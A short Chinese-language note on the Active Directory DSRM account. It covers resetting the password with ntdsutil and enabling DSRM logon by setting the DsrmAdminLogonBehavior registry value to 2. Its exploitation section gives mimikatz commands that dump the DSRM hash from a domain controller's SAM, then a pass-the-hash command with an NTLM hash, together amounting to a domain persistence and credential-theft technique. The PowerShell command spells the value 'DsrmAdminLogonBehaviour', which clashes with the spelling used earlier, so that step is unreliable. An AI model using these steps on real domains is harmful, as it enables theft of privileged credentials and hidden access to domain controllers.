DSRM

机器安装Active Directory服务时,会提示输入DSRM密码;当忘记域控密码的时候,可使用DSRM密码登录。其对应账号是Local Administrator Account,而非Domain Administrator Account。

【Windows域】DSRM - 图1

重置DSRM密码

Changing the DSRM Account Password:

Run the following command on every DC (or remotely against every DC by replacing “null” with DC name)

  1. > NTDSUTIL
  2. > set dsrm password
  3. > reset password on server null
  4. > <PASSWORD>
  5. > Q
  6. > Q

Synchronize the DSRM Account Password with a Domain Account (2k8 & newer):In an elevated CMD prompt where you have logged on as a Domain Admin, run:

  1. NTDSUTIL
  2. SET DSRM PASSWORD
  3. SYNC FROM DOMAIN ACCOUNT <your user here>
  4. Q
  5. Q

DSRM账号登录

DSRM账号登录有三种方式:

  1. Restart in Directory Services Restore Mode (bcdedit /set safeboot dsrepair)
  2. Access DSRM without rebooting (Windows Server 2008 and newer)
    1. Set the registry key DsrmAdminLogonBehavior to 1
    2. Stop the Active Directory service
    3. Logon using DSRM credentials on the console.
  3. Access DSRM without rebooting (Windows Server 2008 and newer)
    1. Set the registry key DsrmAdminLogonBehavior to 2
    2. Logon using DSRM credentials on the console.

改动最小的是第三种,不用重启、也不用停止Active Directory 服务

  1. Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose
  2. Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"

使用.\Administrator主机名\Administrator即可登录域控。

DSRM利用

获取DSRM Password Hash后执行Pass the Hash,

  1. // 域控机器上执行
  2. mimikatz # privilege::debug
  3. mimikatz # token:: elevate
  4. mimikatz # lsadump::sam

【Windows域】DSRM - 图2

  1. // 在非域控机器上执行
  2. mimikatz # sekurlsa::pth /user:Administrator /domain:. /ntlm:b9e0cfceaf6d077970306a2fd88a7c0a

【Windows域】DSRM - 图3

原文

【Windows域】DSRM